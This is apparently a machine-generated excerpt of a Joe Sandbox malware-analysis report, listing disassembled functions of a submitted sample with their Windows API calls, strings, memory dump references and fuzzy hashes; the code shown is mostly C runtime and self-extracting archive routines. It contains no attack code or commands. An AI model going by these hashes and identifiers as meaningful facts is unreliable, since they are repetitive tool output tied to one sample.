                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00BAC868: _free.LIBCMT ref: 00BAC891
                                                                                                                    • _free.LIBCMT ref: 00BAC8F2
                                                                                                                      • Part of subcall function 00BA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34), ref: 00BA8DE2
                                                                                                                      • Part of subcall function 00BA8DCC: GetLastError.KERNEL32(00BB3A34,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34,00BB3A34), ref: 00BA8DF4
                                                                                                                    • _free.LIBCMT ref: 00BAC8FD
                                                                                                                    • _free.LIBCMT ref: 00BAC908
                                                                                                                    • _free.LIBCMT ref: 00BAC95C
                                                                                                                    • _free.LIBCMT ref: 00BAC967
                                                                                                                    • _free.LIBCMT ref: 00BAC972
                                                                                                                    • _free.LIBCMT ref: 00BAC97D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                    • Instruction ID: 3c8237b27ce040e8e647ae2dbdd1ae03fcfa5f2cb6abefa93cc2b9cc0e525157
                                                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                    • Instruction Fuzzy Hash: 7F112171588B04AAE521BBB1CC07FDB7FECAF06B00F404C69B2DD66492DB79B5058750
                                                                                                                    Function 00B9E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00B9E669,00B9E5CC,00B9E86D), ref: 00B9E605
                                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00B9E61B
                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00B9E630
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                    • API String ID: 667068680-1718035505
                                                                                                                    • Opcode ID: 0841a4935b1e0454e376952f0887d3de4a40c75607e3a653396e01f5530b11d0
                                                                                                                    • Instruction ID: 1037877c16f775425e6ec245266d853219cff88d2e7660aa1e31d45a87444067
                                                                                                                    • Opcode Fuzzy Hash: 0841a4935b1e0454e376952f0887d3de4a40c75607e3a653396e01f5530b11d0
                                                                                                                    • Instruction Fuzzy Hash: 92F0C2317802625B0F31DE6D5CC47BA32C8EA35B4132049F9E921DB210EFA0CC509A91
                                                                                                                    Function 00B9146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B914C2
                                                                                                                      • Part of subcall function 00B8B146: GetVersionExW.KERNEL32(?), ref: 00B8B16B
                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B914E6
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B91500
                                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B91513
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B91523
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B91533
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2092733347-0
                                                                                                                    • Opcode ID: d181bac8ebc1636ffba5c1c9daeaea5b09010ba61a4964f94d09167855fbab78
                                                                                                                    • Instruction ID: 1162b829dd58d25e69265854da506c9d286f6ce8e4000a66196b2beeae3f2614
                                                                                                                    • Opcode Fuzzy Hash: d181bac8ebc1636ffba5c1c9daeaea5b09010ba61a4964f94d09167855fbab78
                                                                                                                    • Instruction Fuzzy Hash: 6B31E675108306AFC704DFA8C88599BB7E8FF98714F004A2AF995D3210E770D509CBA6
                                                                                                                    Function 00BA2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,00BA2AF1,00BA02FC,00B9FA34), ref: 00BA2B08
                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BA2B16
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BA2B2F
                                                                                                                    • SetLastError.KERNEL32(00000000,00BA2AF1,00BA02FC,00B9FA34), ref: 00BA2B81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3852720340-0
                                                                                                                    • Opcode ID: 009be9cb460e5315c57bdb161d926e563c36f4a2bbb60786e6f341df48f74612
                                                                                                                    • Instruction ID: 96cc70b0c589c6944edb98ec2dc87ab23874e673c2283dd6f1ad1f7d82064f2b
                                                                                                                    • Opcode Fuzzy Hash: 009be9cb460e5315c57bdb161d926e563c36f4a2bbb60786e6f341df48f74612
                                                                                                                    • Instruction Fuzzy Hash: 3801F77210E3196FA6142B797C85A662BD9EF03B747A047BDF521568F0EF918C009264
                                                                                                                    Function 00BA97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,00BC1030,00BA4674,00BC1030,?,?,00BA3F73,00000050,?,00BC1030,00000200), ref: 00BA97E9
                                                                                                                    • _free.LIBCMT ref: 00BA981C
                                                                                                                    • _free.LIBCMT ref: 00BA9844
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00BC1030,00000200), ref: 00BA9851
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00BC1030,00000200), ref: 00BA985D
                                                                                                                    • _abort.LIBCMT ref: 00BA9863
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3160817290-0
                                                                                                                    • Opcode ID: 7a9eb64808bd97f520f3069089fe8b1587ea00ec7056a64b0a551d7a246df817
                                                                                                                    • Instruction ID: 594b439f7b65583bd6e02785d8f36b2aa0c8d7a70ce347e5dfac56c70b8f8edf
                                                                                                                    • Opcode Fuzzy Hash: 7a9eb64808bd97f520f3069089fe8b1587ea00ec7056a64b0a551d7a246df817
                                                                                                                    • Instruction Fuzzy Hash: D8F0A43614C60167C61233356C5AB5B2AE9DFD3BA1F3402B8F624971A2FF68C801A565
                                                                                                                    Function 00B9DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B9DC47
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9DC61
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9DC72
                                                                                                                    • TranslateMessage.USER32(?), ref: 00B9DC7C
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00B9DC86
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B9DC91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2148572870-0
                                                                                                                    • Opcode ID: 1ded835908c5331ef3d0ff657e865fbf75483eccd698a6aa69a90e47dc10146b
                                                                                                                    • Instruction ID: a5a6e8ce5bc486454d1b9d12d66e4f276556d8fdf96faa7a4ef1010a2aa43a0b
                                                                                                                    • Opcode Fuzzy Hash: 1ded835908c5331ef3d0ff657e865fbf75483eccd698a6aa69a90e47dc10146b
                                                                                                                    • Instruction Fuzzy Hash: 25F03C72A01229BBCF20ABA5DC4CEDB7FBDEF41B91B004121F50AE7051DA749646C7A0
                                                                                                                    Function 00B8C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B905DA: _wcslen.LIBCMT ref: 00B905E0
                                                                                                                      • Part of subcall function 00B8B92D: _wcsrchr.LIBVCRUNTIME ref: 00B8B944
                                                                                                                    • _wcslen.LIBCMT ref: 00B8C197
                                                                                                                    • _wcslen.LIBCMT ref: 00B8C1DF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                                    • API String ID: 3513545583-31770016
                                                                                                                    • Opcode ID: c88224a99567109455639955bc3ba53f75adf4486343cde0120df8db2e59b2b2
                                                                                                                    • Instruction ID: f217683ba578a2e4080b2f9d7414768731e21098516168b7bbe6fb26bda3ca7f
                                                                                                                    • Opcode Fuzzy Hash: c88224a99567109455639955bc3ba53f75adf4486343cde0120df8db2e59b2b2
                                                                                                                    • Instruction Fuzzy Hash: F341F3615503169ACA31BF348896E7ABBE8EF41B44F1049CEF9926B1E1EB704981C371
                                                                                                                    Function 00B9CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 00B9CE9D
                                                                                                                      • Part of subcall function 00B8B690: _wcslen.LIBCMT ref: 00B8B696
                                                                                                                    • _swprintf.LIBCMT ref: 00B9CED1
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,00BC946A), ref: 00B9CEF1
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00B9CFFE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: %s%s%u
                                                                                                                    • API String ID: 110358324-1360425832
                                                                                                                    • Opcode ID: 9ea6ba1da27e6fed868c7daf17f2e6960d8c1ecd3f473dd8b5dbd8ddd2fe7486
                                                                                                                    • Instruction ID: ef36596831a8737b15c667fa76105b26ca5d07aab931b0a55b05e4e50ae77939
                                                                                                                    • Opcode Fuzzy Hash: 9ea6ba1da27e6fed868c7daf17f2e6960d8c1ecd3f473dd8b5dbd8ddd2fe7486
                                                                                                                    • Instruction Fuzzy Hash: FD416CB1900658AADF25ABA1CC85FEE77FCEB05341F4080E6F909E7151EE709A84CF65
                                                                                                                    Function 00B8BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00B8BB27
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00B8A275,?,?,00000800,?,00B8A23A,?,00B8755C), ref: 00B8BBC5
                                                                                                                    • _wcslen.LIBCMT ref: 00B8BC3B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                                    • String ID: UNC$\\?\
                                                                                                                    • API String ID: 3341907918-253988292
                                                                                                                    • Opcode ID: e48a9c43b01514083c6ab7a83e04233beddbc2977d992a563fd2a5fe7cf3f760
                                                                                                                    • Instruction ID: aa91a7f7ba80307199ee5299e067abe250f77da3c5d933e7f4cfce2e246b59ed
                                                                                                                    • Opcode Fuzzy Hash: e48a9c43b01514083c6ab7a83e04233beddbc2977d992a563fd2a5fe7cf3f760
                                                                                                                    • Instruction Fuzzy Hash: 34415B31440216BADF21BF70CC45EEA77E9EF45790F1044E6F955A3261EBB09A90CF60
                                                                                                                    Function 00B9B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadBitmapW.USER32(00000065), ref: 00B9B6ED
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00B9B712
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B9B744
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B9B767
                                                                                                                      • Part of subcall function 00B9A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B9B73D,00000066), ref: 00B9A6D5
                                                                                                                      • Part of subcall function 00B9A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00B9B73D,00000066), ref: 00B9A6EC
                                                                                                                      • Part of subcall function 00B9A6C2: LoadResource.KERNEL32(00000000,?,?,?,00B9B73D,00000066), ref: 00B9A703
                                                                                                                      • Part of subcall function 00B9A6C2: LockResource.KERNEL32(00000000,?,?,?,00B9B73D,00000066), ref: 00B9A712
                                                                                                                      • Part of subcall function 00B9A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B9B73D,00000066), ref: 00B9A72D
                                                                                                                      • Part of subcall function 00B9A6C2: GlobalLock.KERNEL32(00000000), ref: 00B9A73E
                                                                                                                      • Part of subcall function 00B9A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B9A762
                                                                                                                      • Part of subcall function 00B9A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B9A7A7
                                                                                                                      • Part of subcall function 00B9A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00B9A7C6
                                                                                                                      • Part of subcall function 00B9A6C2: GlobalFree.KERNEL32(00000000), ref: 00B9A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                    • String ID: ]
                                                                                                                    • API String ID: 1797374341-3352871620
                                                                                                                    • Opcode ID: d1b062d9224c2f8086dd968f1a9a81a18f43d326c0c5170d73279e80ad8a7c65
                                                                                                                    • Instruction ID: 9e6000393d2250107b89aedbdbe3f400a2a8ef7d49076aa05052402502379533
                                                                                                                    • Opcode Fuzzy Hash: d1b062d9224c2f8086dd968f1a9a81a18f43d326c0c5170d73279e80ad8a7c65
                                                                                                                    • Instruction Fuzzy Hash: 0801C43650011567CF1277B46D49E7F7AFAEBC1B52F1901B1F900B7292DF258D0542A1
                                                                                                                    Function 00B9D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B81316: GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                      • Part of subcall function 00B81316: SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00B9D64B
                                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B9D661
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B9D675
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 00B9D684
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: RENAMEDLG
                                                                                                                    • API String ID: 445417207-3299779563
                                                                                                                    • Opcode ID: 39974deed2ae4ae433f4e11da39fd4b56c55224f6c3c1ed81d8607d7ef58888d
                                                                                                                    • Instruction ID: 7b08f7695a550ca7ea76390fdbda8a7dc456b770dc05640adb321188f20ce20b
                                                                                                                    • Opcode Fuzzy Hash: 39974deed2ae4ae433f4e11da39fd4b56c55224f6c3c1ed81d8607d7ef58888d
                                                                                                                    • Instruction Fuzzy Hash: 82012833345210BBD6215F669D49F6777DDEB9AB41F010465F305B70D0CAA29A048776
                                                                                                                    Function 00BA7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BA7E24,00000000,?,00BA7DC4,00000000,00BBC300,0000000C,00BA7F1B,00000000,00000002), ref: 00BA7E93
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BA7EA6
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00BA7E24,00000000,?,00BA7DC4,00000000,00BBC300,0000000C,00BA7F1B,00000000,00000002), ref: 00BA7EC9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
